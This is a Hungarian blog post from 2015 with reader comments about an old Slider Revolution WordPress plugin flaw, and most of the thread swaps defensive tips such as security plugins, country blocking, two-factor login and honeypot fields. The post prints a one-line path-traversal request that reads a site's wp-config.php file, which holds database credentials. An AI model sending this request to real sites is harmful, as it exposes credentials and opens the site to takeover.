2015. március 21., szombat

A mocskos k..va életbe, most fogtam egy ilyet, simán le lehet vele szedni wordpress konfigot.

A mocskos k..va életbe, most fogtam egy ilyet, simán le lehet vele szedni wordpress konfigot. #wordpress #security #bug

UPDATE: Úgy látom, friss WP-ben javítva van, de érdemes mindenkinek ránézni.

.../wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

WordPress WordPress Magyar Közösség
dátum:
Címkék: , , ,

11 megjegyzés:

  1. Csaba Sári2015. március 21. 12:17

    A revslider bug nagyon régi már, és sokan nem javitják :-( , nálam is kimaradt egy blog, de baszki a google wmt bot küldött értesítést róla..

    VálaszTörlés
  2. Robert Cartman2015. március 21. 12:18

    Pedig ez nem új bug és már javítva is van ha jól olvasom. Nem volt frissítve a plugined?
    http://wptavern.com/critical-security-vulnerability-found-in-wordpress-slider-revolution-plugin-immediate-update-advised

    VálaszTörlés
  3. Laszlo Fazekas2015. március 21. 12:23

    Nem az én oldalam volt, csak egy ügyfélé. Az ok, hogy feltörik az oldalát, csak az a baj, hogy utána spam küldésre használják a blogot, és megy a szerver spam listára egy időre.

    VálaszTörlés
  4. Robert Cartman2015. március 21. 12:27

    LOL a DW-n kipróbáltam a linket, bár tudom hogy nem használjuk ezt a plugint, a védelmünk egyből bannolt XD
    Most könyöröghetem magam vissza egy másik adminnál :D
    http://i.imgur.com/r9SBsR7.png

    update: visszajutottam :D

    VálaszTörlés
  5. Laszlo Fazekas2015. március 21. 12:42

    Mit használtok védelemre?

    VálaszTörlés
  6. Robert Cartman2015. március 21. 13:19

    Wordfence + Block Bad Queries

    VálaszTörlés
  7. Laszlo Fazekas2015. március 21. 13:37

    Köszi. Most Jetpack-nél is láttam egy olyat, hogy x db (asszem 5) hibás bejelentkezés után kitiltja az ip-t. Brute force támadások ellen jó. Nálam pl. folyamatosan csesztetik az összes WP login.php-jét. Persze az ilyen csúnya kérések ellen nem véd.

    VálaszTörlés
  8. Csaba Sári2015. március 21. 13:45

    Laszlo Fazekas​ IThemes Security, az egyik legjobb - de erről Robert Cartman​ nem meggyőzhető ;-)

    VálaszTörlés
  9. Robert Cartman2015. március 21. 13:46

    A szerveren mi letiltottuk tűzfallal a 10 leginkább támadó országot ip alapján, ezzel a támadások 99%-a elhárult. Ami marad azt meg elintézi a wordfence. Plussz még kétlépcsős beléptetés van minden modinak+adminnak (Authy Two Factor Authentication). 

    https://www.howtoforge.com/nginx-how-to-block-visitors-by-country-with-the-geoip-module-debian-ubuntu

    VálaszTörlés
  10. Robert Cartman2015. március 21. 13:49

    Nézd meg ezt a plugint is: Pixel Jar BuddyPress Honeypot

    Könnyen megírhatod magadnak is, annyi hogy tesz egy láthatatlan input mezőt a login oldalra, ami ha ki van töltve, akkor blokkolja a belépést. A bot-ok kitöltik, mert nem veszik észre hogy annak nem is kéne látszani, az embereket meg nem zavarja mert nem is látják. Nagyon kis ötletes és egyszerű, mint egy pofon.

    VálaszTörlés
  11. Robert Cartman2015. március 21. 13:51

    Csaba Sári én teszteltem azt, még amikor Better WP Security néven futott, de nálunk összeomlott tőle az oldal. Valamelyik másik pluginunkkal akadhatott össze, vagy nemtom. Biztos jó amúgy én is sok helyen láttam hogy ajánlják. ;)

    VálaszTörlés

Feliratkozás: Megjegyzések küldése (Atom)